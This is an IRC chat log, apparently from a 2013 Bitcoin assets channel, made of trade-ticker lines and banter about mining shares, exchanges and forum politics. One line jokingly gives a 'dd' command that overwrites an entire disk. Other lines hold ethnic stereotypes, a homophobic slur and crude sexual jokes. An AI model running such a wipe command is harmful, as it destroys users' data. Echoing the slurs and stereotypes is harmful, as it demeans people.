03:32:46 [BTCTC] [ASICMINER-PT] 5 @ 2.55 = 12.75 BTC [+] May 29 03:39:18 [BTCTC] [ASICMINER-PT] 2 @ 2.545 = 5.09 BTC [-] May 29 03:45:11 [BTCTC] [BASIC-MINING] 2 @ 0.62 = 1.24 BTC [+] May 29 03:45:13 [BTCTC] [BASIC-MINING] 1 @ 0.62 BTC [+] May 29 03:46:16 [BTCTC] [BASIC-MINING] 50 @ 0.63 = 31.5 BTC [+] May 29 03:52:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.02483 = 0.1242 BTC [-] May 29 03:54:01 [HAVELOCK] [ASICM] 1 @ 0.02512 BTC [+] May 29 03:54:02 [HAVELOCK] [ASICM] 457 @ 0.02512 = 11.4798 BTC [+] May 29 03:55:02 [HAVELOCK] [ASICM] 1 @ 0.02519999 BTC [+] May 29 04:01:00 [HAVELOCK] [ASICM] 500 @ 0.02525 = 12.625 BTC [+] May 29 04:02:41 [BTCTC] [ASICMINER-PT] 1 @ 2.525 BTC [-] May 29 04:06:01 [HAVELOCK] [ASICM] 500 @ 0.025 = 12.5 BTC [-] May 29 04:08:02 [HAVELOCK] [ASICM] 250 @ 0.025 = 6.25 BTC [-] May 29 04:13:11 [BTCTC] [ASICMINER-PT] 2 @ 2.525 = 5.05 BTC [-] May 29 04:13:47 [BTCTC] [TAT.ASICMINER] 16 @ 0.02495 = 0.3992 BTC [+] May 29 04:15:11 [BTCTC] [ASICMINER-PT] 1 @ 2.521 BTC [-] May 29 04:22:03 [BTCTC] [ASICMINER-PT] 2 @ 2.53 = 5.06 BTC [+] May 29 04:26:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.02471 = 0.0741 BTC [-] May 29 04:30:11 [BTCTC] [TAT.ASICMINER] 66 @ 0.02495 = 1.6467 BTC [+] May 29 04:31:28 [BTCTC] [GSDPT] 2 @ 0.00261 = 0.0052 BTC [-] May 29 04:32:19 [BTCTC] [S.MPOE-PT] 1 @ 0.00067 BTC [-] May 29 04:33:12 [BTCTC] [BITVPS] 25 @ 0.000639 = 0.016 BTC [+] May 29 04:40:02 [HAVELOCK] [SDICE] 5 @ 0.2228 = 1.114 BTC [+] May 29 04:41:02 [HAVELOCK] [SDICE] 11 @ 0.2227 = 2.4497 BTC [-] May 29 04:46:06 hi all May 29 04:46:22 thats better May 29 04:49:36 hey whats new mjr__ May 29 04:56:01 [HAVELOCK] [ASICM] 4 @ 0.0252 = 0.1008 BTC [+] May 29 05:05:45 i lost faith since 2000 May 29 05:13:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.02495 = 0.0998 BTC [+] May 29 05:18:01 [HAVELOCK] [ASICM] 5 @ 0.0252 = 0.126 BTC [+] May 29 05:21:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.02495 = 0.1996 BTC [+] May 29 05:26:28 [BTCTC] [ASICMINER-PT] 4 @ 2.54 = 10.16 BTC [+] May 29 05:34:52 [BTCTC] [ASICMINER-PT] 1 @ 2.545 BTC [+] May 29 05:35:30 [BTCTC] [ASICMINER-PT] 2 @ 2.545 = 5.09 BTC [+] May 29 05:38:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.02495 = 0.0998 BTC [+] May 29 05:39:34 [BTCTC] [PAJKA.BOND] 10 @ 0.1085 = 1.085 BTC [-] May 29 05:39:38 [BTCTC] [BASIC-MINING] 1 @ 0.6399 BTC [+] May 29 05:39:39 [BTCTC] [PAJKA.BOND] 1 @ 0.1082 BTC [-] May 29 05:39:45 [BTCTC] [PAJKA.BOND] 3 @ 0.10813 = 0.3244 BTC [-] May 29 05:39:50 [BTCTC] [PAJKA.BOND] 1 @ 0.10812 BTC [-] May 29 05:39:53 [BTCTC] [PAJKA.BOND] 2 @ 0.10811 = 0.2162 BTC [-] May 29 05:39:57 [BTCTC] [PAJKA.BOND] 11 @ 0.1081 = 1.1891 BTC [-] May 29 05:40:01 [BTCTC] [PAJKA.BOND] 5 @ 0.108 = 0.54 BTC [-] May 29 05:40:10 [BTCTC] [PAJKA.BOND] 5 @ 0.108 = 0.54 BTC [-] May 29 05:41:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.02495 = 0.0998 BTC [+] May 29 05:41:32 [BTCTC] [BASIC-MINING] 2 @ 0.64 = 1.28 BTC [+] **** BEGIN LOGGING AT Wed May 29 15:06:19 2013 May 29 15:06:32 ;;ticker May 29 15:06:33 BTCUSD ticker | Best bid: 129.10002, Best ask: 129.39000, Bid-ask spread: 0.28998, Last trade: 129.10001, 24 hour volume: 16707.74643501, 24 hour low: 125.40000, 24 hour high: 129.87900, 24 hour vwap: 128.18312 May 29 15:06:54 ahh, two months of stability, this is so very cool. May 29 15:07:32 ;;nethash May 29 15:07:32 100058.590916 May 29 15:10:34 ThickAsThieves: im expecting AM divs between 0.02 and 0.03 per share, think im far off the mark? <<< Fairly impossible to say. Last week the nethash was at 80000, and AM only sold its first batch of USBs. My hope is that extra 20000 in hashing is from blade sales, and that the USB sales have picked up to 5000+. It's also always possible that Friedcat retains a div for new May 29 15:10:35 hardware. May 29 15:11:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] May 29 15:13:53 [BTCTC] [TAT.ASICMINER] 95 @ 0.025 = 2.375 BTC [-] May 29 15:14:33 i've been waiting like 5 days for an email response May 29 15:24:06 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1999 = 0.7996 BTC [+] May 29 15:24:18 [BTCTC] [BITVPS] 425 @ 0.000639 = 0.2716 BTC [-] May 29 15:24:45 [BTCTC] [BITVPS] 950 @ 0.00064 = 0.608 BTC [+] May 29 15:25:12 [BTCTC] [BITVPS] 17 @ 0.000699 = 0.0119 BTC [+] May 29 15:25:35 [BTCTC] [BITVPS] 10 @ 0.000744 = 0.0074 BTC [+] May 29 15:25:38 [BTCTC] [ASICMINER-PT] 1 @ 2.53 BTC [-] May 29 15:25:43 [BTCTC] [BITVPS] 2 @ 0.000744 = 0.0015 BTC [+] May 29 15:26:14 [BTCTC] [ASICMINER-PT] 2 @ 2.53 = 5.06 BTC [-] May 29 15:26:16 [BTCTC] [ASICMINER-PT] 2 @ 2.531 = 5.062 BTC [+] May 29 15:26:48 [BTCTC] [ASICMINER-PT] 2 @ 2.531 = 5.062 BTC [+] May 29 15:32:30 [BTCTC] [LTC-MINING] 4 @ 0.44 = 1.76 BTC [+] May 29 15:33:29 [BTCTC] [LTC-MINING] 6 @ 0.45 = 2.7 BTC [+] May 29 15:37:54 [BTCTC] [S.DICE-PT] 1 @ 0.00269 BTC [-] May 29 15:43:08 [BTCTC] [S.DICE-PT] 115 @ 0.00269 = 0.3094 BTC [-] May 29 15:43:10 [BTCTC] [S.DICE-PT] 1796 @ 0.002694 = 4.8384 BTC [+] May 29 15:47:12 [BTCTC] [TAT.ASICMINER] 17 @ 0.025169 = 0.4279 BTC [+] May 29 15:54:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.025169 = 0.0503 BTC [+] May 29 15:56:49 [BTCTC] [TAT.ASICMINER] 2 @ 0.02517 = 0.0503 BTC [+] May 29 15:57:03 [HAVELOCK] [ASICM] 1 @ 0.02543 BTC [+] May 29 16:03:06 http://www.theverge.com/2013/5/29/4375342/fbi-child-pornography-pedophilia-sting-operation May 29 16:03:14 I just got a solicitation from Matthew N. Wright for a conference he is organizing in Amsterdam. May 29 16:03:20 i wonder how running Silk Road is going for them May 29 16:03:26 damn mircea_popescu you are right about these conference organizer people May 29 16:03:54 eh ? May 29 16:04:20 bruce wagner had a conference, we had the intersangro one with nefario, the last one was sponsered by vessenes and now matthew n wright May 29 16:04:37 lol May 29 16:04:41 you know i also had one. May 29 16:04:54 lol May 29 16:05:29 mine however was ciuuuuuulll May 29 16:05:34 cause it wasn't in schiuuuuullll May 29 16:05:54 http://www.reddit.com/r/trapsgonebitcoin May 29 16:06:04 i wonder what cartman would say of bitcoinz. May 29 16:06:17 [BTCTC] [S.DICE-PT] 500 @ 0.0027 = 1.35 BTC [+] May 29 16:06:31 [BTCTC] [S.DICE-PT] 29 @ 0.00271 = 0.0786 BTC [+] May 29 16:07:03 http://www.reddit.com/r/girlsgonebitcoin May 29 16:07:05 well then.. May 29 16:07:26 [BTCTC] [S.DICE-PT] 1 @ 0.00298 BTC [+] May 29 16:09:02 democratizing the porn industry, i like it May 29 16:09:12 no, i would be suprised if that guy has enough credibility left to run a conference May 29 16:09:12 http://bitcoinmagazine.com/okpay-takes-bitcoin-hiatus-2/ May 29 16:09:32 i saw bitcoin magazine at the barnes & noble yesterday, i passed May 29 16:10:24 yes i'm familiar May 29 16:10:25 [BTCTC] [ASICMINER-PT] 1 @ 2.5355 BTC [+] May 29 16:10:25 not bitinstant, bitpay May 29 16:10:45 tony and giga and crew May 29 16:10:52 http://bitcoinmagazine.com/bitcointalk-at-war-with-ad-blockers/ May 29 16:10:56 kinda funny May 29 16:11:14 theymos brags he can circumvent adblocker repeatedly, and fails May 29 16:12:25 and also told them how he was doing it May 29 16:13:07 [BTCTC] [ASICMINER-PT] 1 @ 2.5355 BTC [+] May 29 16:13:16 does anyone like theymos? May 29 16:13:28 ive never dealt with him May 29 16:13:38 i dont know him, but ive yet to see anything positive said about him May 29 16:14:14 i imagine it's not easy to be liked when you're the focal point of a forum May 29 16:14:40 and a forum full of trolls, socks, scammers, noobs, etc May 29 16:15:03 how did he get one of the signing keys May 29 16:15:15 [BTCTC] [ASICMINER-PT] 1 @ 2.5358 BTC [+] May 29 16:15:24 [BTCTC] [ASICMINER-PT] 2 @ 2.5359 = 5.0718 BTC [+] May 29 16:15:40 that sounds smart to me May 29 16:15:47 insider trading lulz May 29 16:15:50 [BTCTC] [ASICMINER-PT] 3 @ 2.5355 = 7.6065 BTC [-] May 29 16:16:02 theymos should no longer be the btctalk admin May 29 16:16:26 who should be? May 29 16:17:10 [BTCTC] [ASICMINER-PT] 1 @ 2.5359 BTC [+] May 29 16:17:39 https://bitcointalk.org/index.php?topic=214520.0 May 29 16:17:41 read the first line May 29 16:17:43 and laugh May 29 16:18:02 [HAVELOCK] [VTX] 1 @ 0.4397 BTC [+] May 29 16:18:10 fiat500 he's a kid, doing okay on the freedom of speech angle, i don't mind him May 29 16:18:14 he has been stonewalling this "forum software" for 20 months now May 29 16:18:39 he got mixed up in the glbse implosion, got out on his word, hopefully it's his last dubious point. May 29 16:18:40 we got +trust feature May 29 16:18:52 that's only forum dev i've seen May 29 16:19:00 as if anyone should be making their own forum software May 29 16:19:02 what a fucking joke May 29 16:19:11 Scrat he has about half a million dollars to do it. May 29 16:19:13 phpbb never did. May 29 16:19:29 course, it's a waste of resourcves, the forum problem is mostly resolved, and not worth money in any event. May 29 16:19:30 phpbb is horrible May 29 16:19:42 however, i dont like how he sells his ads May 29 16:19:48 forum auction for ads is retarded May 29 16:20:02 [HAVELOCK] [ASICM] 4 @ 0.02543 = 0.1017 BTC [+] May 29 16:20:08 why ? May 29 16:20:11 how do you build partnerships that way? May 29 16:20:16 and how can people trust the bids May 29 16:20:34 how would the forum build partnerships anyway. May 29 16:20:38 that's a bad idea. May 29 16:20:55 he could simply have a publishe rate May 29 16:20:59 published May 29 16:21:04 and raise it as necessary May 29 16:21:15 well sure. May 29 16:21:35 then he could cross promote with advertising partners that make longer term commitments May 29 16:21:54 so he can go back to dev or whatever May 29 16:21:54 nah. May 29 16:22:03 then he'd get associated wit hthem. this model sunk the magazine May 29 16:22:12 (on top of the ineptitude of those involved, sure0 May 29 16:22:28 they could partner with bfl... May 29 16:22:45 they practicaloly have May 29 16:22:55 BFL won the ads so many times May 29 16:23:05 and scammed so many people thanks to theymos May 29 16:23:27 yeah. if they had a partnership that'd be it. May 29 16:23:54 [BTCTC] [B.YABMC] 58 @ 0.016899 = 0.9801 BTC [+] May 29 16:23:57 not sure itd be any different really May 29 16:24:02 [HAVELOCK] [ASICM] 393 @ 0.02543 = 9.994 BTC [+] May 29 16:24:11 [BTCTC] [B.YABMC] 1 @ 0.0169 BTC [+] May 29 16:24:19 for all we know they did collude May 29 16:24:25 to have BFL win May 29 16:24:52 you're so grumpy ThickAsThieves May 29 16:24:57 not usually May 29 16:25:11 well for all we know is a weak arguyment in btc May 29 16:25:26 i just think the bidding for ads thing is more appropriate for unrepresented ads May 29 16:25:29 for all we know you're my mom and erik is pumping dice etc etc May 29 16:25:31 like Google Adwords May 29 16:25:55 your mom is the whale May 29 16:26:02 [HAVELOCK] [ASICM] 3 @ 0.02543 = 0.0763 BTC [+] May 29 16:26:14 no urs May 29 16:27:03 [HAVELOCK] [ASICM] 1 @ 0.0254 BTC [-] May 29 16:27:08 healthy skepticism May 29 16:27:27 i'm surprised i turned out to be the tinfoiler in here May 29 16:27:35 new hat for me May 29 16:27:54 well its cause you're new May 29 16:27:59 usually new people are the tinfoilers May 29 16:28:08 (nothing wron with it) May 29 16:38:02 [HAVELOCK] [ASICM] 4 @ 0.02543 = 0.1017 BTC [+] May 29 16:38:33 [BTCTC] [B.YABMC] 1 @ 0.01699 BTC [+] May 29 16:39:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.02517 BTC [+] May 29 16:43:10 delete file, overwrite all free space several times May 29 16:43:42 can be done with standard gnu software May 29 16:43:50 which if you're using an SSD is useless btw May 29 16:43:59 ssd: delete file. May 29 16:47:57 http://www.hostjury.com/blog/view/195/the-great-zero-challenge-remains-unaccepted May 29 16:48:27 [BTCTC] [BITVPS] 500 @ 0.000745 = 0.3725 BTC [+] May 29 16:48:36 dd if=/dev/null of=/dev/sda :p wipe your whole drive :p May 29 16:48:49 file vs. entire drive May 29 16:48:56 some disks do LBA translation May 29 16:49:04 SSDs always do LBA translation May 29 16:49:37 copy everything you need "to the cloud" and then use hammer May 29 16:49:43 lmao May 29 16:50:02 so guys May 29 16:50:06 how are people selling bitcoins now? May 29 16:50:08 ;;ticker May 29 16:50:09 BTCUSD ticker | Best bid: 129.48990, Best ask: 129.48995, Bid-ask spread: 0.00005, Last trade: 129.48995, 24 hour volume: 15505.22792168, 24 hour low: 125.40000, 24 hour high: 129.77000, 24 hour vwap: 128.22300 May 29 16:50:36 in what country? May 29 16:50:39 now is the time to release diablocoin May 29 16:50:41 in the US May 29 16:50:43 eclipse all the other shitty altcoins May 29 16:51:02 tonal diablocoin May 29 16:51:11 coinbase, campbx May 29 16:51:18 tonal diablocoin if you're into BDSM yes May 29 16:51:54 isnt dwolla getting rid of all bitcoin exchanges? May 29 16:52:19 seems to be healthy with campbx May 29 16:52:30 coinbase does ACH May 29 16:52:43 and Ukto is hinting that Weex will do ACH soon May 29 16:53:31 coinbase is the simplest, only requiring checking account verification with test deposits May 29 16:53:49 bulbul investments? lol May 29 16:53:53 campbx requires full KYC if you wanna do decently sized tx May 29 16:53:53 is campbx run by arabs? May 29 16:54:07 i forget the nationality of the owner May 29 16:54:13 pretty sure he's middle eastern May 29 16:54:43 bulbul is arabic for songbird May 29 16:54:48 interesting May 29 16:54:49 mtgox is run by jews and btce are black May 29 16:55:39 share buyback complete? May 29 16:55:42 has nothing to do with DMC May 29 16:55:48 Diablo-D3: i know someone who wants 80btc worth May 29 16:57:10 you guys, how can i get my app to have charts and graphs and all the things May 29 16:57:26 how many btc can I sell on coinbase without triggering KVC May 29 16:57:32 mjr_: there are dozens of js charting frameworks May 29 16:57:38 that's "structuring" May 29 16:57:45 mjr_: get one that uses D3, theres several May 29 16:57:47 Diablo-D3: you can sell 50btc per day/month May 29 16:57:59 if you are selling that many, dont use coinbase May 29 16:58:05 diablo, i dunno if/when coinbase requires KYC, they only use ACH so maybe it's not needed. May 29 16:58:14 ThickAsThieves: ahh May 29 16:58:16 fiat500: why not? May 29 16:58:19 btw CampBx recently got their MSB May 29 16:58:20 fiat500: i know, mostly an amir taaki joke May 29 16:58:22 Diablo-D3: 50btc limit May 29 16:58:47 if its 50btc per month, I can just sell 50btc per month May 29 16:59:19 LMFAO what a coincidence May 29 16:59:23 i just got an email May 29 16:59:25 "Good news. You can now buy and sell more bitcoin on Coinbase." May 29 16:59:29 they just increased my limit May 29 16:59:55 nice May 29 16:59:57 weird, they said it would take 30 days after the first purchase, its only been 1 week May 29 17:00:12 coinbase actually was really cool about some bug they had May 29 17:00:16 nice guys May 29 17:00:55 Diablo-D3: actually its 50btc/day May 29 17:01:00 very reasonable then May 29 17:02:03 Diablo-D3: if you are selling that many, would you be interested in selling 80 to a colleague of mine? May 29 17:02:15 why you cashing out D3 May 29 17:03:07 hah, it wasnt a coincidence, they have a bug - simply visiting https://coinbase.com/verifications causes you to get an email letting you know your limits have been increased May 29 17:03:43 lmao May 29 17:04:21 lol May 29 17:05:37 "experts". May 29 17:05:49 somebody should write the book of humiliating VCs. May 29 17:06:11 to be fair mircea_popescu, this is a pretty harmless bug :P May 29 17:06:38 depends. harmless, in what sense ? May 29 17:07:02 its just a redundant email informing you of a change that already happened May 29 17:07:08 no change to account state occurs because of it May 29 17:07:13 these are unequal concepts. a bug is a bug in any definition. it may only be harmless for some definitions of harm May 29 17:07:25 which one may or may not agree on. so no bug can be truly harmless. May 29 17:07:41 fiat500: no because it shows you that they couldn't handle simple things like that May 29 17:08:03 there you go. May 29 17:08:26 ive seen worth things from google, you guys use google right? lol May 29 17:08:29 *worse May 29 17:08:41 <[\\\]> share buyback complete? << is DMC being wound down? May 29 17:09:14 well google is broad. if youtube spews out errors I could care less May 29 17:09:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.025199 BTC [+] May 29 17:09:55 this is about money. have you seen all these threads wrt coinbase negative balances? May 29 17:10:17 Scrat they never manned up to that lol. May 29 17:10:25 [BTCTC] [ASICMINER-PT] 2 @ 2.53589 = 5.0718 BTC [-] May 29 17:10:27 [BTCTC] [ASICMINER-PT] 6 @ 2.5359 = 15.2154 BTC [+] May 29 17:10:28 [BTCTC] [ASICMINER-PT] 1 @ 2.536 BTC [+] May 29 17:10:30 [BTCTC] [ASICMINER-PT] 10 @ 2.537 = 25.37 BTC [+] May 29 17:10:47 [\\\] from what i understand,yes. May 29 17:11:41 [BTCTC] [TAT.ASICMINER] 4 @ 0.0251 = 0.1004 BTC [-] May 29 17:12:26 [BTCTC] [S.DICE-PT] 6 @ 0.00298 = 0.0179 BTC [+] May 29 17:18:34 <[\\\]> oh look, someone's editing live css on bitcointalk May 29 17:18:40 <[\\\]> let's not use staging guys May 29 17:18:42 [BTCTC] [ASICMINER-PT] 1 @ 2.538 BTC [+] May 29 17:18:44 <[\\\]> just edit live code May 29 17:19:19 http://www.reddit.com/r/Bitcoin/comments/1f9apl/alert_microsoft_advertising_network_is_serving_up/ May 29 17:19:30 mtgox.org trap May 29 17:20:03 oh shit May 29 17:20:05 mah coinz May 29 17:20:20 idiots for not reserving the main tlds May 29 17:22:21 [\\\]: what makes you say that May 29 17:22:48 [BTCTC] [TAT.ASICMINER] 16 @ 0.0251 = 0.4016 BTC [-] May 29 17:23:35 <[\\\]> Scrat: what makes me say what? May 29 17:23:41 <[\\\]> editing live code? May 29 17:23:47 <[\\\]> it looks like shit at the moment May 29 17:24:01 <[\\\]> someone's editing stuff and screwed something up May 29 17:24:27 <[\\\]> meh May 29 17:24:28 always looked like shit so I can't see the difference May 29 17:24:52 <[\\\]> for a while, the header wasn't laying out correctly May 29 17:25:05 <[\\\]> the 'new' icon was showing as crappy text, etc May 29 17:28:03 lol scrat May 29 17:28:59 hey mp did you get my pm lol May 29 17:30:25 [BTCTC] [TAT.ASICMINER] 40 @ 0.025199 = 1.008 BTC [+] May 29 17:32:12 hi May 29 17:33:53 [BTCTC] [TAT.ASICMINER] 37 @ 0.025199 = 0.9324 BTC [+] May 29 17:35:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.025199 BTC [+] May 29 17:39:31 mircea_popescu: did your girl watch this http://www.youtube.com/watch?v=nYzXNhk3Vjw May 29 17:39:46 what is it ? May 29 17:39:55 http://i.imgur.com/IPP4xHP.gif May 29 17:40:09 ahahah May 29 17:41:00 princess taaki May 29 17:41:13 [BTCTC] [ESECURITYSABTC] 1 @ 0.318999 BTC [-] May 29 17:41:51 cant watch it May 29 17:41:55 too painful May 29 17:41:58 :\ May 29 17:42:37 lolk May 29 17:46:39 [BTCTC] [S.DICE-PT] 2 @ 0.00296 = 0.0059 BTC [-] May 29 17:46:43 what the fuck do you do if a chick thinks your earwax tastes great ?! May 29 17:47:15 try it out for yourself? May 29 17:47:59 its not bad but i mean... wtf. May 29 17:48:37 [BTCTC] [TAT.ASICMINER] 55 @ 0.025239 = 1.3881 BTC [+] May 29 17:51:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.025249 BTC [+] May 29 17:51:35 [BTCTC] [ASICMINER-PT] 1 @ 2.538 BTC [+] May 29 17:52:38 Goat, is that div verified? May 29 17:53:03 [HAVELOCK] [ASICM] 70 @ 0.02543 = 1.7801 BTC [+] May 29 17:54:36 he was on crosstalk? May 29 17:54:50 did he talk about the charts and graphs and all the things? May 29 17:55:48 hehe May 29 17:56:58 big buy on gox May 29 17:57:34 ;;ticker May 29 17:57:35 BTCUSD ticker | Best bid: 128.90000, Best ask: 129.22581, Bid-ask spread: 0.32581, Last trade: 129.22581, 24 hour volume: 13643.33032007, 24 hour low: 126.00000, 24 hour high: 129.77000, 24 hour vwap: 128.54519 May 29 17:57:41 meh May 29 17:58:25 [BTCTC] [TAT.ASICMINER] 43 @ 0.025249 = 1.0857 BTC [+] May 29 17:58:35 [BTCTC] [ASICMINER-PT] 1 @ 2.538 BTC [+] May 29 17:59:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.02525 = 0.0505 BTC [+] May 29 17:59:46 [BTCTC] [ASICMINER-PT] 1 @ 2.538 BTC [+] **** BEGIN LOGGING AT Wed May 29 18:29:54 2013 May 29 18:30:05 would someone say they were not capitalist? were they retarded? May 29 18:30:11 they seem to have done ok for themselves May 29 18:30:20 but all the robber barons donated a LOT to charity May 29 18:30:30 think of it this way May 29 18:30:34 how do the rich get rich May 29 18:30:55 every dollar they have, if obtained legally, came from someone else who willingly parted with it in exchange for some service or good May 29 18:31:08 so they are as rich as they have done things that benefitted peple May 29 18:31:10 people May 29 18:31:29 so...in order for them to get the dollars that others wanted to give them, they have to HAVE others with dollars May 29 18:31:50 the tale of king midas was a cautionary tale, too many forget that May 29 18:32:27 lol, you starve to death alone and unloved, but shit tons of gold May 29 18:32:36 sound fun? May 29 18:32:53 money is not important in and of itself, its the things that money can get you May 29 18:33:04 which are typically created by other people May 29 18:33:12 have you ever been to a dry county in america? May 29 18:33:24 your money can't get you an alcoholic beverage May 29 18:33:46 you can have millions of dollars in the bank, if you have no cash and walk into a cash only restaurant, you're broke May 29 18:34:05 you can't buy liquor in a dry county in america May 29 18:34:11 usagi not true, dry counties, local laws prevent LARD from being sold in some places. Raw milk farmer raided in maine last week. May 29 18:34:24 yes, trans fat in new york city is another example May 29 18:34:28 etc etc etc May 29 18:34:52 point is, unless you feel like by yourself producing everything you will ever want, its a good idea for other people to have money May 29 18:34:58 and produce things that you will want May 29 18:35:30 so if we establish that others are necessary, and no man is an island, it stands to reason that the best society is the one with the most productive members May 29 18:35:43 and due to the network effect, we all gain more than just the sum of our production May 29 18:36:15 so a homeless guy is not only an affront to my sense of decency and aesthetics, its also robbing me of what he could have produced May 29 18:36:59 Bitfunder: Graet.Loan May 29 18:37:02 the main point that i took away was that the pie is not fixed in size, none of the things we have now were found in a forest, we built them, man creates wealth, not finds it May 29 18:37:06 anybody know anything? .05% daily May 29 18:37:24 [BTCTC] [BITVPS] 1 @ 0.000749 BTC [+] May 29 18:37:37 slightly better yield than namworlds May 29 18:37:50 ;;calc .05*365 May 29 18:37:50 18.25 May 29 18:37:58 that doesn't take into account compounding May 29 18:38:19 and who knows what the risk free rate is in bitcoin land anyway May 29 18:38:44 yes, but there is such a thing as a risk free rate May 29 18:38:57 which is the generally accepted best class of investment closest to risk free May 29 18:39:04 i agree May 29 18:39:11 but we have a "risk free rate" May 29 18:39:17 which is a specific term May 29 18:39:34 its not without risk, the same way that breakfast cereal is not without rat turds May 29 18:39:44 but there is a rate we agree upon where we will consider it to be rat turd free May 29 18:39:55 hahaha May 29 18:41:07 so, i think that charitability is not incompatible with self interest May 29 18:41:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] May 29 18:41:50 i always could May 29 18:41:56 i don't think i will get the return i'm looking for May 29 18:42:23 if someone could channel and use the tons of homeless people we have towards a purpose they could become very rich May 29 18:42:29 king midas got off easy. May 29 18:42:56 how much money would it take for you to be ok with never having sex again? May 29 18:43:07 lol, never having food again? May 29 18:43:25 depends, could I fap? May 29 18:43:33 [BTCTC] [ASICMINER-PT] 3 @ 2.539 = 7.617 BTC [+] May 29 18:43:41 but his touch was reversed May 29 18:43:45 [BTCTC] [ASICMINER-PT] 12 @ 2.54 = 30.48 BTC [+] May 29 18:43:55 [BTCTC] [ASICMINER-PT] 1 @ 2.54 BTC [+] May 29 18:44:14 [BTCTC] [TAT.ASICMINER] 21 @ 0.02525 = 0.5303 BTC [+] May 29 18:44:28 [BTCTC] [ASICMINER-PT] 4 @ 2.54 = 10.16 BTC [+] May 29 18:46:02 [BTCTC] [ASICMINER-PT] 2 @ 2.54 = 5.08 BTC [+] May 29 18:46:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.02525 BTC [+] May 29 18:46:12 its a myth, it has a ton of different endings i'm sure May 29 18:46:23 but whether he lives or dies, the gold touch was a curse not a blessing May 29 18:46:27 i just watched a scam ending then May 29 18:47:19 the touch was reversed and he could buttsex his daughter again May 29 18:48:04 rofl May 29 18:48:10 son* May 29 18:48:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.02525 = 0.1263 BTC [+] May 29 18:49:07 anyways, this is why hoarding will never work as a long term strategy May 29 18:49:29 because like midas, it becomes worthless to have all of something May 29 18:49:35 [BTCTC] [BASIC-MINING] 2 @ 0.63999 = 1.28 BTC [-] May 29 18:49:39 [BTCTC] [BASIC-MINING] 3 @ 0.64 = 1.92 BTC [+] May 29 18:49:59 because the currency if not actually standing in place for something else that you want, is really worth nothing May 29 18:50:23 example: ripple May 29 18:50:25 oh wait! May 29 18:50:28 Dividends for TAT.AM shares are all paid out except for BTCTC, which is scheduled. Payout is 0.00025211 per share. May 29 18:51:35 [BTCTC] [ASICMINER-PT] 2 @ 2.539 = 5.078 BTC [-] May 29 18:51:37 next week is going to be worse May 29 18:51:42 [BTCTC] [ASICMINER-PT] 2 @ 2.54 = 5.08 BTC [+] May 29 18:51:54 <0.02 May 29 18:54:03 !ticker h asicm May 29 18:54:06 [HAVELOCK:ASICM] 1D: 0.02430000 / 0.0250097 / 0.02543000 (7818 shares, 195.52584850 BTC), 7D: 0.02110000 / 0.02512687 / 0.02765000 (80743 shares, 2028.81857870 BTC), 30D: 0.01290000 / 0.02100759 / 0.03000000 (258249 shares, 5425.18959427 BTC) May 29 18:54:51 can anyone confirm to me if they got their TAT.AM divs on BTCTC? May 29 18:56:27 thius is pretty cool, -assets econ class. May 29 18:57:09 [BTCTC] [ASICMINER-PT] 1 @ 2.539 BTC [-] May 29 18:57:10 lol May 29 18:57:30 i actually think the dumbest people in the bitcoin space have to be a little smarter than the average american when it comes to economics May 29 18:57:47 but yes, mircea_popescu is in the top 5 May 29 18:57:56 of which i only named 2 May 29 18:58:09 mjr_: or they like teh hashish May 29 18:58:20 well, you seem smart May 29 18:58:27 but i don't really know you very well May 29 18:58:45 and haven't listened to enough to make my own judgement, though it is just my opinion we are talking about May 29 18:58:58 so, its not some definitive metric May 29 18:59:07 just the people who are very impressive to one internet nobody May 29 18:59:38 that does count for some mjr points May 29 18:59:46 im in the who ? May 29 19:00:14 mircea_popescu: i just said that erik voorhees, and you are in my opinion in the top 5 smartest people in the bitcoin space May 29 19:00:20 o May 29 19:00:39 i haven't actually come up with the other 3 yet, but they obviously exist May 29 19:00:47 gavin for sure. May 29 19:00:58 i dunno how he manages not to explode, drowned in a barrel of idiots May 29 19:01:02 and it was only my opinion as one guy who has observed, but yeah, gavin probably gets one of the spots, mike hearn too May 29 19:01:02 [HAVELOCK] [ASICM] 11 @ 0.02539 = 0.2793 BTC [-] May 29 19:01:05 on a ship afloat a sea of idiots May 29 19:01:32 thats two tech guys, two business/finance guys May 29 19:01:36 who is the 5th May 29 19:01:42 taaki May 29 19:01:54 LOL, it came up specifically due to amir taaki's interview May 29 19:01:59 on crosstalk May 29 19:02:13 because i said that jon matonis, trace meyer, or erik would have destroyed that ed guy May 29 19:02:16 but anyway : mpoe-pr May 29 19:02:19 16:00 < mircea_popescu> on a ship afloat a sea of idiots May 29 19:02:21 AHAHAHAHAHAH May 29 19:02:23 so it's not the "smartest five fags in btc" May 29 19:02:25 priceless quote May 29 19:02:33 while amir just kinda looked his usual way, though maybe better than last time i suppose May 29 19:03:02 [HAVELOCK] [ASICM] 7 @ 0.02539 = 0.1777 BTC [-] May 29 19:03:03 [HAVELOCK] [ASICM] 1 @ 0.02539 BTC [-] May 29 19:03:05 [HAVELOCK] [ASICM] 1 @ 0.02539 BTC [-] May 29 19:03:27 next can we pick the bitcoin mohhamed ? May 29 19:03:30 mircea_popescu: while i think mpoe-pr is very smart, i don't know if most would see that, while she brilliantly can eviscerate others ideas, rarely does she posit her own, and as a PR person, its not really her job to do so, but rather to point at others who have done May 29 19:03:55 [BTCTC] [TAT.ASICMINER] 43 @ 0.02525 = 1.0858 BTC [+] May 29 19:03:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02525 BTC [+] May 29 19:04:02 [HAVELOCK] [VTX] 1 @ 0.4397 BTC [+] May 29 19:04:21 i thought the union was identical to the intersection? :P May 29 19:05:03 [HAVELOCK] [ASICM] 4 @ 0.0253 = 0.1012 BTC [-] May 29 19:05:06 the subject is now wheelbarrows. May 29 19:05:10 